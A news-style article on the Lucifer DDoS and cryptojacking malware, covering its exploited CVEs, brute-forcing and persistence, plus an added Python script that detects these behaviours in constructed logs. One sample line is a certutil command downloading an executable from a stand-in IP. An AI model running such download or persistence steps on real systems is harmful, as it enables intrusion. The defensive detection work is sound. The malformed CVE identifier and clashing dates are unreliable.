The Lucifer malware
A new, powerful DDoS and cryptojacking malware named Lucifer exploits numerous vulnerabilities to infect Windows computers. This malware is part of an ongoing campaign against Windows hosts. In its latest wave of attacks, Lucifer uses a variety of weaponized vulnerabilities.
In a post from Wednesday, Palo Alto Networks’ Unit 42 explains that the creators of the malware have called their invention Satan DDoS, but since another malware named Satan Ransomware already exists, the researchers chose to give the new malware a distinct name of its own.
On 10 June, the first attack wave with Lucifer v.1 was detected. The malware was updated to v.2 a day later and literally wreaked havoc on target computers. Sadly, as of now, the attacks have not resumed.
The latest variant, Lucifer v.2, was discovered on 29 May during an investigation of the exploitation of CVE-19-1881, a bug in the Laravel Framework that can be abused for remote code execution (RCE). Further examination showed that the investigated vulnerability is just one of many flaws the malware uses, depending on which version of Lucifer – one or two – is in operation.
The exhaustive list of vulnerabilities that this malware targets includes CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, the ThinkPHP RCE vulnerabilities (CVE-2018-20062), CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, the PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464. All of them carry either “high” or “critical” ratings, since once exploited they let the attacker execute arbitrary commands on the compromised device.
Fortunately, patches have been released for all of the reported security flaws. However, hosts that have not applied the available patches are trivial to attack, and the ultimate goal in most cases is the execution of cryptocurrency-mining code.
Lucifer is known to be a potent hybrid malware that can cryptojack compromised computers and manipulate them into carrying out DDoS attacks. The malware scans for targets with open ports 135 (RPC) and 1433 (MSSQL) and uses credential-stuffing attacks to access them. The researchers have said that the malware may infect its targets through brute-force attacks against IPC, WMI, SMB, and FTP, as well as MSSQL, RPC, and network sharing. Once established on an infected machine, the malware drops XMRig, a program used to mine the Monero (XMR) cryptocurrency. Lucifer can also connect to a command-and-control (C2) server to receive commands such as launching DDoS attacks, stealing or transferring device data, and notifying its operators of the Monero miner’s status.
To spread, Lucifer uses a variety of vulnerabilities and brute-force attacks that help it compromise additional hosts linked to the originally infected device. The researchers report that the malware targets Windows hosts both on the Internet and on the intranet, because the intruder uses the certutil utility in the payload to spread the malware. The malware will also alter the Windows registry to set itself as a startup process. It will also drop the EternalBlue, EternalRomance and DoublePulsar backdoors to establish persistence. By checking for the presence of sandboxes or virtual machines, Lucifer attempts to avoid detection and reverse engineering. If it finds any, the malware enters an “infinite loop” that halts its operation.
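The behaviours described in the two paragraphs above (credential stuffing against ports 135 and 1433, certutil used to pull the payload onto further hosts, and a registry Run key for startup persistence) are all visible in ordinary host and network telemetry. The following Python script is an added example, not code from the Unit 42 report or from the malware, showing how a defender could flag each of them. The key=value log layout and every log line, host name, IP address, file path and registry value name in it are constructed for this example and do not come from the article.

```python
"""Detect Lucifer-style behaviour in constructed log lines (added example).

Assumptions: a simple key=value event format (not any vendor's schema), with
event=netconn for connection/login outcomes, event=proc for process creation
and event=regset for registry writes. All sample data below is constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SCAN_PORTS = {135, 1433}            # RPC and MSSQL, the ports the article says Lucifer probes
FAILED_LOGIN_THRESHOLD = 5          # failed logins from one source within WINDOW
WINDOW = timedelta(minutes=5)
KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')                 # key=value or key="quoted value"
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)  # startup persistence keys
URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed telemetry: one credential-stuffing source, one benign failed login,
# certutil used as a downloader next to a legitimate hash check, and a Run-key
# write next to an unrelated registry write. IPs, hosts and paths are made up.
SAMPLE_LOGS = [
    r"2020-06-10T10:00:01 event=netconn src=10.0.0.5 dst=10.0.0.20 dport=1433 outcome=failed_login",
    r"2020-06-10T10:00:12 event=netconn src=10.0.0.5 dst=10.0.0.20 dport=1433 outcome=failed_login",
    r"2020-06-10T10:00:25 event=netconn src=10.0.0.5 dst=10.0.0.21 dport=1433 outcome=failed_login",
    r"2020-06-10T10:00:40 event=netconn src=10.0.0.5 dst=10.0.0.22 dport=135 outcome=failed_login",
    r"2020-06-10T10:01:03 event=netconn src=10.0.0.5 dst=10.0.0.23 dport=1433 outcome=failed_login",
    r"2020-06-10T10:01:30 event=netconn src=10.0.0.5 dst=10.0.0.24 dport=1433 outcome=failed_login",
    r"2020-06-10T10:05:00 event=netconn src=10.0.0.7 dst=10.0.0.20 dport=1433 outcome=failed_login",
    r'2020-06-10T10:02:00 event=proc host=WS01 image=C:\Windows\System32\certutil.exe cmdline="certutil -urlcache -split -f http://198.51.100.9/stage.exe C:\Users\Public\stage.exe"',
    r'2020-06-10T10:02:30 event=proc host=WS02 image=C:\Windows\System32\certutil.exe cmdline="certutil -hashfile C:\tools\setup.msi SHA256"',
    r"2020-06-10T10:03:00 event=regset host=WS01 key=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchelper data=C:\Users\Public\stage.exe",
    r"2020-06-10T10:03:10 event=regset host=WS02 key=HKCU\Software\ExampleVendor\App\Theme data=dark",
]


def parse(line):
    """Split '<timestamp> k=v k="v with spaces" ...' into a dict with a datetime ts."""
    ts, rest = line.split(" ", 1)
    fields = {m.group(1): (m.group(3) if m.group(3) is not None else m.group(2))
              for m in KV_RE.finditer(rest)}
    fields["ts"] = datetime.fromisoformat(ts)
    return fields


def detect_credential_stuffing(events):
    """Return sources with >= FAILED_LOGIN_THRESHOLD failed logins to 135/1433 inside one WINDOW."""
    attempts = defaultdict(list)
    for e in events:
        if (e.get("event") == "netconn" and e.get("outcome") == "failed_login"
                and int(e.get("dport", 0)) in SCAN_PORTS):
            attempts[e["src"]].append(e["ts"])
    hits = []
    for src, times in attempts.items():
        times.sort()
        for i, start in enumerate(times):
            # sliding window: count attempts from this one forward that fall inside WINDOW
            if sum(1 for t in times[i:] if t - start <= WINDOW) >= FAILED_LOGIN_THRESHOLD:
                hits.append(src)
                break
    return hits


def detect_certutil_download(events):
    """Return (host, cmdline) for certutil launches whose command line carries a URL."""
    return [(e.get("host"), e.get("cmdline", "")) for e in events
            if e.get("event") == "proc"
            and e.get("image", "").lower().endswith("certutil.exe")
            and URL_RE.search(e.get("cmdline", ""))]


def detect_run_key_persistence(events):
    """Return (host, key) for writes under a CurrentVersion\\Run or RunOnce key."""
    return [(e.get("host"), e.get("key", "")) for e in events
            if e.get("event") == "regset" and RUN_KEY_RE.search(e.get("key", ""))]


def analyze(lines):
    """Run all three detectors over raw log lines and return their findings."""
    events = [parse(line) for line in lines]
    return {
        "credential_stuffing": detect_credential_stuffing(events),
        "certutil_download": detect_certutil_download(events),
        "run_key_persistence": detect_run_key_persistence(events),
    }


if __name__ == "__main__":
    for name, findings in analyze(SAMPLE_LOGS).items():
        print(f"{name}: {findings}")
```

The thresholds and window are deliberately loose starting points; a production rule would tune them to the environment and would also alert on certutil launches whose parent is a scripting host or a service account, since a legitimate hash check from an administrator and a download staged by malware look identical at the image-name level.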
In conclusion, the researchers say that Lucifer is the latest hybrid of DDoS and cryptojacking malware that exploits old weaknesses in Windows to carry out malicious activities. They therefore recommend that users apply all updates and recently released Windows patches to improve their chances of protecting against this infection.